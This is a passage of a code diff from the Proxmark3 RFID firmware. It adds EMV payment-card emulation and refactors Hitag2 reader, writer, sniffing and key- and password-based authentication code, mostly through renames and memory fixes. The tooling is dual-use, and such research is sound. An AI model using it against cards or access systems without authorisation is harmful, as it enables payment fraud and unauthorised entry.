+                if (!CheckCrc14A(receivedCmd, receivedCmd_len)) {
+                    if (g_dbglevel >= DBG_EXTENDED)
+                        Dbprintf("[MFEMUL_WORK] All commands must have a valid CRC %02X (%d)", receivedCmd,
+                                 receivedCmd_len);
+                    break;
+                }
+
+                // rule 13 of 7.5.3. in ISO 14443-4. chaining shall be continued
+                // BUT... ACK --> NACK
+                if (receivedCmd_len == 1 && receivedCmd[0] == CARD_ACK) {
+                    Dbprintf("[MFEMUL_WORK] ACK --> NACK !!");
+                    EmSend4bit(CARD_NACK_NA);
+                    FpgaDisableTracing();
+                    break;
+                }
+
+                // rule 12 of 7.5.3. in ISO 14443-4. R(NAK) --> R(ACK)
+                if (receivedCmd_len == 1 && receivedCmd[0] == CARD_NACK_NA) {
+                    Dbprintf("[MFEMUL_WORK] NACK --> NACK !!");
+                    EmSend4bit(CARD_ACK);
+                    FpgaDisableTracing();
+                    break;
+                }
+
+                // case MFEMUL_WORK => CMD RATS
+                if (receivedCmd_len == 4 && receivedCmd[0] == ISO14443A_CMD_RATS && receivedCmd[1] == 0x80) {
+                    if (rats && rats_len) {
+                        EmSendCmd(rats, rats_len);
+                        FpgaDisableTracing();
+                    } else {
+                        EmSend4bit(CARD_NACK_NA);
+                        FpgaDisableTracing();
+                        cardSTATE_TO_IDLE();
+                        if (g_dbglevel >= DBG_EXTENDED)
+                            Dbprintf("[MFEMUL_WORK] RCV RATS => NACK");
+                    }
+                    break;
+                }
+
+                // case MFEMUL_WORK => ISO14443A_CMD_NXP_DESELECT
+                if (receivedCmd_len == 3 && receivedCmd[0] == ISO14443A_CMD_NXP_DESELECT) {
+                    if (rats && rats_len) {
+                        EmSendCmd(receivedCmd, receivedCmd_len);
+
+                        FpgaDisableTracing();
+                        if (g_dbglevel >= DBG_EXTENDED)
+                            Dbprintf("[MFEMUL_WORK] RCV NXP DESELECT => ACK");
+                    } else {
+                        EmSend4bit(CARD_NACK_NA);
+                        FpgaDisableTracing();
+                        cardSTATE_TO_IDLE();
+                        if (g_dbglevel >= DBG_EXTENDED)
+                            Dbprintf("[MFEMUL_WORK] RCV NXP DESELECT => NACK");
+                    }
+                    break;
+                }
+
+
+                // From this point onwards is where the 'magic' happens
+                ExecuteEMVSim(receivedCmd, receivedCmd_len, receivedCmd_copy, receivedCmd_len_copy);
+
+                // We want to keep a copy of the command we just saw, because we will process it once we get the
+                // WTX response
+                Dbprintf("Caching command for later processing... its length is %d", receivedCmd_len);
+                memcpy(receivedCmd_copy, receivedCmd, receivedCmd_len);
+                receivedCmd_len_copy = receivedCmd_len;
+            }
+
+            continue;
+        }  // End Switch Loop
+
+        button_pushed = BUTTON_PRESS();
+    }  // End While Loop
+
+    FpgaDisableTracing();
+
+    if (g_dbglevel >= DBG_ERROR) {
+        Dbprintf("Emulator stopped. Tracing: %d  trace length: %d ", get_tracing(), BigBuf_get_traceLen());
+    }
+
+    FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF);
+    LEDsoff();
+    set_tracing(false);
+    BigBuf_free_keep_EM();
+}
+
+// annotate iso 7816
+void annotate(uint8_t *cmd, uint8_t cmdsize) {
+    if (cmdsize < 2) {
+        return;
+    }
+
+    // From https://mvallim.github.io/emv-qrcode/docs/EMV_v4.3_Book_3_Application_Specification_20120607062110791.pdf
+    // section 6.3.2
+    switch (cmd[1]) {
+        case ISO7816_APPLICATION_BLOCK: {
+            Dbprintf("APPLICATION BLOCK");
+            break;
+        }
+        case ISO7816_APPLICATION_UNBLOCK: {
+            Dbprintf("APPLICATION UNBLOCK");
+            break;
+        }
+        case ISO7816_CARD_BLOCK: {
+            Dbprintf("CARD BLOCK");
+            break;
+        }
+        case ISO7816_EXTERNAL_AUTHENTICATION: {
+            Dbprintf("EXTERNAL AUTHENTICATE");
+            break;
+        }
+        case ISO7816_GENERATE_APPLICATION_CRYPTOGRAM: {
+            Dbprintf("GENERATE APPLICATION CRYPTOGRAM");
+            break;
+        }
+        case ISO7816_GET_CHALLENGE: {
+            Dbprintf("GET CHALLENGE");
+            break;
+        }
+        case ISO7816_GET_DATA: {
+            Dbprintf("GET DATA");
+            break;
+        }
+        case ISO7816_GET_PROCESSING_OPTIONS: {
+            Dbprintf("GET PROCESSING OPTIONS");
+            break;
+        }
+        case ISO7816_INTERNAL_AUTHENTICATION: {
+            Dbprintf("INTERNAL AUTHENTICATION");
+            break;
+        }
+        case ISO7816_PIN_CHANGE: {
+            Dbprintf("PIN CHANGE");
+            break;
+        }
+        case ISO7816_READ_RECORDS: {
+            Dbprintf("READ RECORDS");
+            break;
+        }
+        case ISO7816_SELECT_FILE: {
+            Dbprintf("SELECT FILE");
+            break;
+        }
+        case ISO7816_VERIFY: {
+            Dbprintf("VERIFY");
+            break;
+        }
+        default: {
+            Dbprintf("NOT RECOGNISED");
+            break;
+        }
+    }
+}

armsrc/emvsim.h

@@ -0,0 +1,30 @@
+//-----------------------------------------------------------------------------
+// Copyright (C) Gerhard de Koning Gans - May 2008
+// Copyright (C) Proxmark3 contributors. See AUTHORS.md for details.
+//
+// This program is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// This program is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+// GNU General Public License for more details.
+//
+// See LICENSE.txt for the text of the license.
+//-----------------------------------------------------------------------------
+// Mifare Classic Card Simulation
+//-----------------------------------------------------------------------------
+
+#ifndef __EMVSIM_H
+#define __EMVSIM_H
+
+#include "common.h"
+
+#define AUTHKEYNONE              0xff
+
+void EMVsim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *uid, uint16_t atqa, uint8_t sak);
+void annotate(uint8_t *cmd, uint8_t cmdsize);
+
+#endif

armsrc/epa.c

@@ -649,5 +649,5 @@ void EPA_PACE_Simulate(const PacketCommandNG *c) {
 
     Dbprintf("Standardized Domain Parameter: %i", pace_version_info.parameter_id);
     DbpString("");
-    DbpString("finished");
+    DbpString("Done!");
 }

armsrc/felica.c

@@ -241,8 +241,8 @@ static uint8_t felica_select_card(felica_card_select_t *card) {
     // We try 10 times, or if answer was received.
     int len = 25;
     do {
-        // end-of-reception response packet data, wait approx. 501μs
-        // end-of-transmission command packet data, wait approx. 197μs
+        // end-of-reception response packet data, wait approx. 501µs
+        // end-of-transmission command packet data, wait approx. 197µs
         // polling card
         TransmitFor18092_AsReader(poll, sizeof(poll), NULL, 1, 0);
 
@@ -497,7 +497,7 @@ static void iso18092_setup(uint8_t fpga_minor_mode) {
     BigBuf_Clear_ext(false);
 
     // Initialize Demod and Uart structs
-    // DemodInit(BigBuf_malloc(MAX_FRAME_SIZE));
+    // DemodInit(BigBuf_calloc(MAX_FRAME_SIZE));
     FelicaFrameinit(BigBuf_calloc(FELICA_MAX_FRAME_SIZE));
 
     felica_nexttransfertime = 2 * DELAY_ARM2AIR_AS_READER;  // 418

armsrc/fpgaloader.c

@@ -185,7 +185,9 @@ void FpgaSetupSsc(uint16_t fpga_mode) {
 // ourselves, not to another buffer).
 //-----------------------------------------------------------------------------
 bool FpgaSetupSscDma(uint8_t *buf, uint16_t len) {
-    if (buf == NULL) return false;
+    if (buf == NULL) {
+        return false;
+    }
 
     FpgaDisableSscDma();
     AT91C_BASE_PDC_SSC->PDC_RPR = (uint32_t) buf;  // transfer to this memory address
@@ -521,10 +523,11 @@ void FpgaDownloadAndGo(int bitstream_target) {
     lz4_stream_t compressed_fpga_stream;
     LZ4_streamDecode_t lz4StreamDecode_body = {{ 0 }};
     compressed_fpga_stream.lz4StreamDecode = &lz4StreamDecode_body;
-    uint8_t *output_buffer = BigBuf_malloc(FPGA_RING_BUFFER_BYTES);
+    uint8_t *output_buffer = BigBuf_calloc(FPGA_RING_BUFFER_BYTES);
 
-    if (!reset_fpga_stream(bitstream_target, &compressed_fpga_stream, output_buffer))
+    if (reset_fpga_stream(bitstream_target, &compressed_fpga_stream, output_buffer) == false) {
         return;
+    }
 
     uint32_t bitstream_length;
     if (bitparse_find_section(bitstream_target, 'e', &bitstream_length, &compressed_fpga_stream, output_buffer)) {

armsrc/frozen.c

@@ -26,7 +26,7 @@
 #include "nprintf.h"
 
 #include "BigBuf.h"
-#define malloc(X) BigBuf_malloc(X)
+#define malloc(X) BigBuf_calloc(X)
 #define free(X)
 
 #if !defined(WEAK)
@@ -1360,7 +1360,7 @@ int json_prettify(const char *s, int len, struct json_out *out) {
 int json_prettify_file(const char *file_name) WEAK;
 int json_prettify_file(const char *file_name) {
     int res = -1;
-    char *s = json_fread(file_name);
+    const char *s = json_fread(file_name);
     FILE *fp;
     if (s != NULL && (fp = fopen(file_name, "wb")) != NULL) {
         struct json_out out = JSON_OUT_FILE(fp);
@@ -1369,6 +1369,9 @@ int json_prettify_file(const char *file_name) {
             /* On error, restore the old content */
             fclose(fp);
             fp = fopen(file_name, "wb");
+            if (fp == NULL) {
+                return -1;
+            }
             fseek(fp, 0, SEEK_SET);
             fwrite(s, 1, strlen(s), fp);
         } else {

armsrc/hfsnoop.c

@@ -107,7 +107,7 @@ int HfSniff(uint32_t samplesToSkip, uint32_t triggersToSkip, uint16_t *len, uint
     SpinDelay(100);
 
     *len = BigBuf_max_traceLen();
-    uint8_t *mem = BigBuf_malloc(*len);
+    uint8_t *mem = BigBuf_calloc(*len);
 
     uint32_t trigger_cnt = 0;
     uint16_t r = 0, interval = 0;

armsrc/hitag2.c

@@ -14,8 +14,6 @@
 // See LICENSE.txt for the text of the license.
 //-----------------------------------------------------------------------------
 
-#define DBG  if (g_dbglevel >= DBG_EXTENDED)
-
 #include "hitag2.h"
 #include "hitag2/hitag2_crypto.h"
 #include "string.h"
@@ -322,7 +320,7 @@ static void hitag2_handle_reader_command(uint8_t *rx, const size_t rxlen, uint8_
 
 // reader/writer
 // returns how long it took
-static uint32_t hitag_reader_send_bit(int bit) {
+static uint32_t hitag2_reader_send_bit(int bit) {
     // Binary pulse length modulation (BPLM) is used to encode the data stream
     // This means that a transmission of a one takes longer than that of a zero
 
@@ -351,13 +349,13 @@ static uint32_t hitag_reader_send_bit(int bit) {
 
 // reader / writer commands
 // frame_len is in number of bits?
-static uint32_t hitag_reader_send_frame(const uint8_t *frame, size_t frame_len) {
+static uint32_t hitag2_reader_send_frame(const uint8_t *frame, size_t frame_len) {
     WDT_HIT();
 
     uint32_t wait = 0;
     // Send the content of the frame
     for (size_t i = 0; i < frame_len; i++) {
-        wait += hitag_reader_send_bit((frame[i / 8] >> (7 - (i % 8))) & 1);
+        wait += hitag2_reader_send_bit((frame[i / 8] >> (7 - (i % 8))) & 1);
     }
 
     // Send EOF
@@ -380,14 +378,14 @@ static uint32_t hitag_reader_send_frame(const uint8_t *frame, size_t frame_len)
 
 // reader / writer commands
 // frame_len is in number of bits?
-static uint32_t hitag_reader_send_framebits(const uint8_t *frame, size_t frame_len) {
+static uint32_t hitag2_reader_send_framebits(const uint8_t *frame, size_t frame_len) {
 
     WDT_HIT();
 
     uint32_t wait = 0;
     // Send the content of the frame
     for (size_t i = 0; i < frame_len; i++) {
-        wait += hitag_reader_send_bit(frame[i]);
+        wait += hitag2_reader_send_bit(frame[i]);
     }
 
     // Send EOF
@@ -456,11 +454,16 @@ static bool hitag1_plain(uint8_t *rx, const size_t rxlen, uint8_t *tx, size_t *t
             /*tx[0] = 0xb0; // Rev 3.0*/
             tx[0] = HITAG1_SET_CC; // Rev 2.0
             *txlen = 5;
-            if (!bCollision) blocknr--;
+
+            if (bCollision == false) {
+                blocknr--;
+            }
+
             if (blocknr < 0) {
                 blocknr = 0;
             }
-            if (!hitag_s) {
+
+            if (hitag_s == false) {
                 if (blocknr > 1 && blocknr < 31) {
                     blocknr = 31;
                 }
@@ -485,11 +488,13 @@ static bool hitag1_plain(uint8_t *rx, const size_t rxlen, uint8_t *tx, size_t *t
             } else {
                 memcpy(tag.sectors[blocknr], rx, 4);
                 blocknr++;
-                if (!hitag_s) {
+
+                if (hitag_s == false) {
                     if (blocknr > 1 && blocknr < 31) {
                         blocknr = 31;
                     }
                 }
+
                 if (blocknr > 63) {
                     DbpString("Read successful!");
                     *txlen = 0;
@@ -505,18 +510,16 @@ static bool hitag1_plain(uint8_t *rx, const size_t rxlen, uint8_t *tx, size_t *t
                 tx[2] = crc << 4;
                 *txlen = 20;
             }
+            break;
         }
-        break;
         default: {
             Dbprintf("Unknown frame length: %d", rxlen);
             return false;
         }
-        break;
     }
     return true;
 }
 
-
 static bool hitag1_authenticate(uint8_t *rx, const size_t rxlen, uint8_t *tx, size_t *txlen) {
     uint8_t crc;
     *txlen = 0;
@@ -526,18 +529,24 @@ static bool hitag1_authenticate(uint8_t *rx, const size_t rxlen, uint8_t *tx, si
             /*tx[0] = 0xb0; // Rev 3.0*/
             tx[0] = HITAG1_SELECT; // Rev 2.0
             *txlen = 5;
+
             if (bCrypto && byte_value <= 0xff) {
                 // to retry
                 bCrypto = false;
             }
-            if (!bCollision) blocknr--;
+
+            if (bCollision == false) {
+                blocknr--;
+            }
+
             if (blocknr < 0) {
                 blocknr = 0;
             }
+
             bCollision = true;
             // will receive 32-bit UID
+            break;
         }
-        break;
         case 2: {
             if (bAuthenticating) {
                 // received Auth init ACK, send nonce
@@ -562,8 +571,8 @@ static bool hitag1_authenticate(uint8_t *rx, const size_t rxlen, uint8_t *tx, si
                 *txlen = 20;
                 // will receive 32-bit encrypted page
             }
+            break;
         }
-        break;
         case 32: {
             if (bCollision) {
                 // Select card by serial from response
@@ -629,13 +638,12 @@ static bool hitag1_authenticate(uint8_t *rx, const size_t rxlen, uint8_t *tx, si
                                 *txlen = 20;
                 */
             }
+            break;
         }
-        break;
         default: {
             Dbprintf("Unknown frame length: %d", rxlen);
             return false;
         }
-        break;
     }
 
     return true;
@@ -715,8 +723,8 @@ static bool hitag2_password(uint8_t *rx, const size_t rxlen, uint8_t *tx, size_t
                 }
                 *txlen = 5;
                 memcpy(tx, "\xC0", nbytes(*txlen));
+                break;
             }
-            break;
 
             // Received UID, tag password
             case 32: {
@@ -730,7 +738,9 @@ static bool hitag2_password(uint8_t *rx, const size_t rxlen, uint8_t *tx, size_t
                     // stage 2, got config byte+password TAG, discard as will read later
                     if (bAuthenticating) {
                         bAuthenticating = false;
+
                         if (write) {
+
                             if (!hitag2_write_page(rx, rxlen, tx, txlen)) {
                                 return false;
                             }
@@ -752,15 +762,13 @@ static bool hitag2_password(uint8_t *rx, const size_t rxlen, uint8_t *tx, size_t
                     tx[0] = HITAG2_READ_PAGE | (blocknr << 3) | ((blocknr ^ 7) >> 2);
                     tx[1] = ((blocknr ^ 7) << 6);
                 }
+                break;
             }
-            break;
-
             // Unexpected response
             default: {
                 DBG Dbprintf("Unknown frame length: " _RED_("%d"), rxlen);
                 return false;
             }
-            break;
         }
     }
 
@@ -823,12 +831,17 @@ static bool hitag2_crypto(uint8_t *rx, const size_t rxlen, uint8_t *tx, size_t *
                 // stage 1, got UID
                 if (bCrypto == false) {
 
+                    uint64_t ui64key = key[0] |
+                                       ((uint64_t)key[1]) << 8 |
+                                       ((uint64_t)key[2]) << 16 |
+                                       ((uint64_t)key[3]) << 24 |
+                                       ((uint64_t)key[4]) << 32 |
+                                       ((uint64_t)key[5]) << 40;
+
+                    uint32_t ui32uid = MemLeToUint4byte(rx);
+
                     DBG Dbprintf("hitag2_crypto: key array ");
                     DBG Dbhexdump(6, key, false);
-
-                    uint64_t ui64key = key[0] | ((uint64_t)key[1]) << 8 | ((uint64_t)key[2]) << 16 | ((uint64_t)key[3]) << 24 | ((uint64_t)key[4]) << 32 | ((uint64_t)key[5]) << 40;
-
-                    uint32_t ui32uid = rx[0] | ((uint32_t)rx[1]) << 8 | ((uint32_t)rx[2]) << 16 | ((uint32_t)rx[3]) << 24;
                     DBG Dbprintf("hitag2_crypto: key=0x%x%x uid=0x%x"
                                  , (uint32_t)((REV64(ui64key)) >> 32)
                                  , (uint32_t)((REV64(ui64key)) & 0xffffffff)
@@ -1000,9 +1013,8 @@ static bool hitag2_test_auth_attempts(uint8_t *rx, const size_t rxlen, uint8_t *
             }
             *txlen = 5;
             memcpy(tx, "\xc0", nbytes(*txlen));
+            break;
         }
-        break;
-
         // Received UID, crypto tag answer, or read block response
         case 32: {
             if (bCrypto == false) {
@@ -1018,16 +1030,13 @@ static bool hitag2_test_auth_attempts(uint8_t *rx, const size_t rxlen, uint8_t *
                 auth_table_pos += 8;
                 memcpy(NrAr, auth_table + auth_table_pos, 8);
             }
+            break;
         }
-        break;
-
         default: {
             Dbprintf("Unknown frame length: " _RED_("%d"), rxlen);
             return false;
         }
-        break;
     }
-
     return true;
 }
 
@@ -1038,7 +1047,6 @@ void hitag_sniff(void) {
 
     BigBuf_free();
     BigBuf_Clear_ext(false);
-    clear_trace();
     set_tracing(true);
 
     // Set up eavesdropping mode, frequency divisor which will drive the FPGA
@@ -1063,7 +1071,6 @@ void SniffHitag2(bool ledcontrol) {
 
     BigBuf_free();
     BigBuf_Clear_ext(false);
-    clear_trace();
     set_tracing(true);
 
     /*
@@ -1420,7 +1427,6 @@ void SimulateHitag2(bool ledcontrol) {
 
     BigBuf_free();
     BigBuf_Clear_ext(false);
-    clear_trace();
     set_tracing(true);
 
     // empties bigbuff etc
@@ -1432,12 +1438,7 @@ void SimulateHitag2(bool ledcontrol) {
 
     auth_table_len = 0;
     auth_table_pos = 0;
-//    auth_table = BigBuf_malloc(AUTH_TABLE_LENGTH);
-//    memset(auth_table, 0x00, AUTH_TABLE_LENGTH);
-
-    // Reset the received frame, frame count and timing info
-//    memset(rx, 0x00, sizeof(rx));
-//    memset(tx, 0x00, sizeof(tx));
+//    auth_table = BigBuf_calloc(AUTH_TABLE_LENGTH);
 
     DbpString("Starting Hitag 2 simulation");
 
@@ -1673,14 +1674,14 @@ void ReaderHitag(const lf_hitag_data_t *payload, bool ledcontrol) {
 
     // Check configuration
     switch (payload->cmd) {
-        case RHT1F_PLAIN: {
+        case HT1F_PLAIN: {
             DBG Dbprintf("Read public blocks in plain mode");
             // this part will be unreadable
             memset(tag.sectors + 2, 0x0, 30);
             blocknr = 0;
             break;
         }
-        case RHT1F_AUTHENTICATE: {
+        case HT1F_AUTHENTICATE: {
             DBG Dbprintf("Read all blocks in authed mode");
 
             memcpy(nonce, payload->nonce, 4);
@@ -1706,7 +1707,7 @@ void ReaderHitag(const lf_hitag_data_t *payload, bool ledcontrol) {
             blocknr = 0;
             break;
         }
-        case RHT2F_PASSWORD: {
+        case HT2F_PASSWORD: {
             DBG Dbprintf("List identifier in password mode");
             if (memcmp(payload->pwd, "\x00\x00\x00\x00", 4) == 0) {
                 memcpy(password, tag.sectors[1], sizeof(password));
@@ -1718,7 +1719,7 @@ void ReaderHitag(const lf_hitag_data_t *payload, bool ledcontrol) {
             bAuthenticating = false;
             break;
         }
-        case RHT2F_AUTHENTICATE: {
+        case HT2F_AUTHENTICATE: {
             DBG DbpString("Authenticating using NrAr pair:");
             memcpy(NrAr, payload->NrAr, 8);
             DBG Dbhexdump(8, NrAr, false);
@@ -1729,7 +1730,7 @@ void ReaderHitag(const lf_hitag_data_t *payload, bool ledcontrol) {
             bAuthenticating = false;
             break;
         }
-        case RHT2F_CRYPTO: {
+        case HT2F_CRYPTO: {
             DBG DbpString("Authenticating using key:");
             memcpy(key, payload->key, 6);  //HACK; 4 or 6??  I read both in the code.
             DBG Dbhexdump(6, key, false);
@@ -1741,7 +1742,7 @@ void ReaderHitag(const lf_hitag_data_t *payload, bool ledcontrol) {
             bAuthenticating = false;
             break;
         }
-        case RHT2F_TEST_AUTH_ATTEMPTS: {
+        case HT2F_TEST_AUTH_ATTEMPTS: {
             DBG Dbprintf("Testing " _YELLOW_("%d") " authentication attempts", (auth_table_len / 8));
             auth_table_pos = 0;
             memcpy(NrAr, auth_table, 8);
@@ -1819,27 +1820,27 @@ void ReaderHitag(const lf_hitag_data_t *payload, bool ledcontrol) {
         // By default reset the transmission buffer
         tx = txbuf;
         switch (payload->cmd) {
-            case RHT1F_PLAIN: {
+            case HT1F_PLAIN: {
                 bStop = !hitag1_plain(rx, rxlen, tx, &txlen, false);
                 break;
             }
-            case RHT1F_AUTHENTICATE: {
+            case HT1F_AUTHENTICATE: {
                 bStop = !hitag1_authenticate(rx, rxlen, tx, &txlen);
                 break;
             }
-            case RHT2F_PASSWORD: {
+            case HT2F_PASSWORD: {
                 bStop = !hitag2_password(rx, rxlen, tx, &txlen, false);
                 break;
             }
-            case RHT2F_AUTHENTICATE: {
+            case HT2F_AUTHENTICATE: {
                 bStop = !hitag2_authenticate(rx, rxlen, tx, &txlen, false);
                 break;
             }
-            case RHT2F_CRYPTO: {
+            case HT2F_CRYPTO: {
                 bStop = !hitag2_crypto(rx, rxlen, tx, &txlen, false);
                 break;
             }
-            case RHT2F_TEST_AUTH_ATTEMPTS: {
+            case HT2F_TEST_AUTH_ATTEMPTS: {
                 bStop = !hitag2_test_auth_attempts(rx, rxlen, tx, &txlen);
                 break;
             }
@@ -1868,7 +1869,7 @@ void ReaderHitag(const lf_hitag_data_t *payload, bool ledcontrol) {
         }
 
         // Transmit the reader frame
-        command_duration = hitag_reader_send_frame(tx, txlen);
+        command_duration = hitag2_reader_send_frame(tx, txlen);
         response_start = command_start + command_duration;
 
         // Let the antenna and ADC values settle
@@ -1960,9 +1961,10 @@ void ReaderHitag(const lf_hitag_data_t *payload, bool ledcontrol) {
         memset(rx, 0x00, sizeof(rx));
         rxlen = 0;
 
-        // If there is no response, just repeat the loop
+        // If there is no response
         if (detected_tag_modulation == false) {
-            continue;
+            checked = -1;
+            goto out;
         }
 
         // Make sure we always have an even number of samples. This fixes the problem
@@ -2089,17 +2091,17 @@ void WriterHitag(const lf_hitag_data_t *payload, bool ledcontrol) {
 
     // Check configuration
     switch (payload->cmd) {
-        case WHT2F_CRYPTO: {
-            DbpString("Authenticating using key:");
+        case HT2F_CRYPTO: {
+            DBG DbpString("Authenticating using key:");
             memcpy(key, payload->key, 6); //HACK; 4 or 6??  I read both in the code.
             memcpy(writedata, payload->data, 4);
             Dbhexdump(6, key, false);
             blocknr = payload->page;
             bCrypto = false;
             bAuthenticating = false;
+            break;
         }
-        break;
-        case WHT2F_PASSWORD: {
+        case HT2F_PASSWORD: {
             DBG DbpString("Authenticating using password:");
             if (memcmp(payload->pwd, "\x00\x00\x00\x00", 4) == 0) {
                 memcpy(password, tag.sectors[1], sizeof(password));
@@ -2111,14 +2113,13 @@ void WriterHitag(const lf_hitag_data_t *payload, bool ledcontrol) {
             blocknr = payload->page;
             bPwd = false;
             bAuthenticating = false;
+            break;
         }
-        break;
         default: {
-            Dbprintf("Error, unknown function: " _RED_("%d"), payload->cmd);
+            DBG Dbprintf("Error, unknown function: " _RED_("%d"), payload->cmd);
             reply_ng(CMD_LF_HITAG2_WRITE, PM3_ESOFT, NULL, 0);
             return;
         }
-        break;
     }
 
     if (ledcontrol) LED_D_ON();
@@ -2186,11 +2187,11 @@ void WriterHitag(const lf_hitag_data_t *payload, bool ledcontrol) {
         tx = txbuf;
 
         switch (payload->cmd) {
-            case WHT2F_CRYPTO: {
+            case HT2F_CRYPTO: {
                 bStop = !hitag2_crypto(rx, rxlen, tx, &txlen, true);
                 break;
             }
-            case WHT2F_PASSWORD: {
+            case HT2F_PASSWORD: {
                 bStop = !hitag2_password(rx, rxlen, tx, &txlen, true);
                 break;
             }
@@ -2218,7 +2219,7 @@ void WriterHitag(const lf_hitag_data_t *payload, bool ledcontrol) {
         }
 
         // Transmit the reader frame
-        command_duration = hitag_reader_send_frame(tx, txlen);
+        command_duration = hitag2_reader_send_frame(tx, txlen);
 
         // global write state variable used
         // tearoff occurred
@@ -2438,9 +2439,9 @@ static void ht2_send(bool turn_on, uint32_t *cmd_start
 
     // Transmit the reader frame
     if (send_bits) {
-        *cmd_duration = hitag_reader_send_framebits(tx, txlen);
+        *cmd_duration = hitag2_reader_send_framebits(tx, txlen);
     } else {
-        *cmd_duration = hitag_reader_send_frame(tx, txlen);
+        *cmd_duration = hitag2_reader_send_frame(tx, txlen);
     }
 
     *resp_start = (*cmd_start + *cmd_duration);
@@ -2590,7 +2591,6 @@ bool ht2_packbits(uint8_t *nrz_samples, size_t nrzs, uint8_t *rx, size_t *rxlen)
     }
     return true;
 }
-
 int ht2_read_uid(uint8_t *uid, bool ledcontrol, bool send_answer, bool keep_field_up) {
 
     g_logging = false;
@@ -2600,6 +2600,7 @@ int ht2_read_uid(uint8_t *uid, bool ledcontrol, bool send_answer, bool keep_fiel
         clear_trace();
     }
 
+
     // hitag 2 state machine?
     hitag2_init();
 

armsrc/hitagS.h

@@ -24,8 +24,9 @@
 #include "common.h"
 #include "hitag.h"
 
-void SimulateHitagSTag(bool tag_mem_supplied, const uint8_t *data, bool ledcontrol);
-void ReadHitagS(const lf_hitag_data_t *payload, bool ledcontrol);
-void WritePageHitagS(const lf_hitag_data_t *payload, bool ledcontrol);
-void Hitag_check_challenges(const uint8_t *data, uint32_t datalen, bool ledcontrol);
+void hts_simulate(bool tag_mem_supplied, int8_t threshold, const uint8_t *data, bool ledcontrol);
+void hts_read(const lf_hitag_data_t *payload, bool ledcontrol);
+void hts_write_page(const lf_hitag_data_t *payload, bool ledcontrol);
+void hts_check_challenges(const uint8_t *data, uint32_t datalen, bool ledcontrol);
+int hts_read_uid(uint32_t *uid, bool ledcontrol, bool send_answer);
 #endif

armsrc/hitag_common.c

@@ -0,0 +1,539 @@
+//-----------------------------------------------------------------------------
+// Copyright (C) Proxmark3 contributors. See AUTHORS.md for details.
+//
+// This program is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// This program is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+// GNU General Public License for more details.
+//
+// See LICENSE.txt for the text of the license.
+//-----------------------------------------------------------------------------
+// Hitag shared functionality
+//-----------------------------------------------------------------------------
+
+#include "hitag_common.h"
+
+#include "proxmark3_arm.h"
+#include "cmd.h"
+#include "BigBuf.h"
+#include "fpgaloader.h"
+#include "ticks.h"
+#include "dbprint.h"
+#include "util.h"
+#include "string.h"
+#include "commonutil.h"
+#include "hitag2/hitag2_crypto.h"
+#include "lfadc.h"
+#include "crc.h"
+#include "protocols.h"
+#include "appmain.h"    // tearoff_hook()
+
+uint16_t timestamp_high = 0;  // Timer Counter 2 overflow count, combined with TC2 counter for ~47min timing
+
+static void hitag_stop_clock(void) {
+    AT91C_BASE_TC0->TC_CCR = AT91C_TC_CLKDIS;
+    AT91C_BASE_TC1->TC_CCR = AT91C_TC_CLKDIS;
+    AT91C_BASE_TC2->TC_CCR = AT91C_TC_CLKDIS;
+}
+
+static void hitag_init_clock(void) {
+    // Enable Peripheral Clock for
+    //   Timer Counter 0, used to measure exact timing before answering
+    //   Timer Counter 1, used to capture edges of the tag frames
+    //   Timer Counter 2, used to log trace time
+    AT91C_BASE_PMC->PMC_PCER |= (1 << AT91C_ID_TC0) | (1 << AT91C_ID_TC1) | (1 << AT91C_ID_TC2);
+
+    AT91C_BASE_PIOA->PIO_BSR = GPIO_SSC_FRAME;
+
+    // Disable timer during configuration
+    hitag_stop_clock();
+
+    // TC0: Capture mode, default timer source = MCK/32 (TIMER_CLOCK3), no triggers
+    AT91C_BASE_TC0->TC_CMR = AT91C_TC_CLKS_TIMER_DIV3_CLOCK;
+
+    // TC1: Capture mode, default timer source = MCK/32 (TIMER_CLOCK3), TIOA is external trigger,
+    AT91C_BASE_TC1->TC_CMR = AT91C_TC_CLKS_TIMER_DIV3_CLOCK  // use MCK/32 (TIMER_CLOCK3)
+                             | AT91C_TC_ABETRG               // TIOA is used as an external trigger
+                             | AT91C_TC_ETRGEDG_FALLING      // external trigger on falling edge
+                             | AT91C_TC_LDRA_RISING          // load RA on on rising edge of TIOA
+                             | AT91C_TC_LDRB_FALLING;        // load RB on on falling edge of TIOA
+
+    // TC2: Capture mode, default timer source = MCK/32 (TIMER_CLOCK3), no triggers
+    AT91C_BASE_TC2->TC_CMR = AT91C_TC_CLKS_TIMER_DIV3_CLOCK;
+
+    // Enable and reset counters
+    AT91C_BASE_TC0->TC_CCR = AT91C_TC_CLKEN | AT91C_TC_SWTRG;
+    AT91C_BASE_TC1->TC_CCR = AT91C_TC_CLKEN | AT91C_TC_SWTRG;
+    AT91C_BASE_TC2->TC_CCR = AT91C_TC_CLKEN | AT91C_TC_SWTRG;
+
+    // Assert a sync signal. This sets all timers to 0 on next active clock edge
+    AT91C_BASE_TCB->TCB_BCR = 1;
+
+    // synchronized startup procedure
+    // In theory, with MCK/32, we shouldn't be waiting longer than 32 instruction statements, right?
+    while (AT91C_BASE_TC0->TC_CV != 0) {
+    };  // wait until TC0 returned to zero
+
+    // reset timestamp
+    timestamp_high = 0;
+}
+
+// Initialize FPGA and timer for Hitag operations
+void hitag_setup_fpga(uint16_t conf, uint8_t threshold, bool ledcontrol) {
+    StopTicks();
+
+    FpgaDownloadAndGo(FPGA_BITSTREAM_LF);
+
+    // Clean up trace and prepare it for storing frames
+    set_tracing(true);
+    clear_trace();
+
+    if (ledcontrol) LED_D_ON();
+
+    hitag_init_clock();
+
+    // Set fpga in edge detect with/without reader field, we can modulate as reader/tag now
+    FpgaWriteConfWord(FPGA_MAJOR_MODE_LF_EDGE_DETECT | conf);
+    FpgaSendCommand(FPGA_CMD_SET_DIVISOR, LF_DIVISOR_125);  //125kHz
+    if (threshold != 127) FpgaSendCommand(FPGA_CMD_SET_EDGE_DETECT_THRESHOLD, threshold);
